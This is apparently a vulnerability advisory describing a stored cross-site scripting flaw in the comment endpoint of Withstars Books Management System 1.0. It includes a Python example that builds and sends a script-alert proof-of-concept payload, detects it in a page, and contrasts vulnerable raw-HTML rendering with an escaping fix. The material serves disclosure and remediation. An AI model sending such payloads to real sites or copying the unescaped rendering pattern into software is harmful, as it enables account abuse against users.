Withstars Books Management System Cross-Site Scripting Vulnerability

Vulnerability

A stored cross-site scripting (XSS) vulnerability has been identified in Withstars Books Management System version 1.0. The issue is in the Comment Handler component, specifically the '/api/comment/add' endpoint: the 'content' parameter of a new comment is stored and later rendered in the article page without adequate sanitisation or output encoding. A remote attacker can therefore submit a comment whose 'content' contains JavaScript. Because the comment is persisted server-side, the script executes in the browser of every user who subsequently views the affected article page; no further action by the attacker is needed, and the victim does nothing beyond opening the page.

Impact

Exploitation results in stored cross-site scripting: the injected script runs in the application's origin, in the browser of any user who views the comments, and can act on that user's behalf within the application (including any administrative user who reviews comments).

Reproduction

To reproduce this vulnerability, send a POST request to the '/api/comment/add' endpoint with a 'content' parameter that contains a script element, for example one that calls alert(). Include the 'name', 'email' and 'articleId' parameters as well, with 'articleId' referring to an existing article. Once the comment is stored, the injected script executes each time that article is viewed.
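The following is an added example, not code from the Withstars project or from the original advisory. It builds the proof-of-concept request described above, checks an article page for the live (unencoded) payload, and shows the vulnerable rendering pattern beside the output-encoding fix that neutralises it. The endpoint and the parameter names ('content', 'name', 'email', 'articleId') come from the advisory; the base URL, the form-encoded request body, the article id 1, the filler values for 'name' and 'email', and the rendering functions are assumptions made for illustration.

```python
"""
Added example (not Withstars project code): PoC request builder, a check for
the stored payload in a fetched page, and vulnerable vs. fixed rendering.
"""
import html
import urllib.parse
import urllib.request

ENDPOINT = "/api/comment/add"  # endpoint named in the advisory

# Constructed payload: a script element calling alert(), as the advisory describes.
POC_PAYLOAD = "<script>alert(document.domain)</script>"


def build_poc_form(article_id: int, payload: str = POC_PAYLOAD) -> dict:
    """Parameters for the PoC POST. Parameter names are from the advisory;
    the 'name' and 'email' values are assumed filler for required fields."""
    return {
        "name": "tester",
        "email": "tester@example.com",
        "articleId": str(article_id),
        "content": payload,
    }


def send_poc(base_url: str, article_id: int) -> int:
    """Send the PoC to a running instance and return the HTTP status.
    Assumes the endpoint accepts an application/x-www-form-urlencoded body
    (an assumption; adjust to JSON if the deployed handler expects it).
    Not exercised offline."""
    body = urllib.parse.urlencode(build_poc_form(article_id)).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + ENDPOINT,
        data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    with urllib.request.urlopen(req) as resp:
        return resp.status


def page_is_vulnerable(page_html: str, payload: str = POC_PAYLOAD) -> bool:
    """Given the article page fetched after posting the PoC, report whether
    the payload was rendered as live markup. If only the HTML-encoded form
    appears, the page encodes on output and the check is negative."""
    return payload in page_html


def render_comment_vulnerable(content: str) -> str:
    """Illustrative vulnerable pattern (assumed, not the project's template):
    stored comment text is concatenated into the page as raw HTML."""
    return f'<div class="comment">{content}</div>'


def render_comment_fixed(content: str) -> str:
    """Corrected pattern: HTML-encode untrusted text when it is placed into
    an HTML element body. quote=True also covers attribute contexts."""
    return f'<div class="comment">{html.escape(content, quote=True)}</div>'


if __name__ == "__main__":
    vulnerable_page = render_comment_vulnerable(POC_PAYLOAD)
    fixed_page = render_comment_fixed(POC_PAYLOAD)
    print("vulnerable rendering executes payload:", page_is_vulnerable(vulnerable_page))
    print("fixed rendering executes payload:     ", page_is_vulnerable(fixed_page))
    # To test a live instance (assumed URL): send_poc("http://localhost:8080", 1)
```

The escaping shown is correct for comment text inserted into an HTML element body; if the application ever places comment content inside a script block, an event-handler attribute, or a URL, the encoding has to match that context instead, and a template engine's auto-escaping should be preferred over hand-written escaping. A Content-Security-Policy without 'unsafe-inline' is a useful second layer but does not replace fixing the output encoding.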

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread: 0.0
impact: 1.7
exploitability: 7.7
remediation: 0.0
relevance: 0.0
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.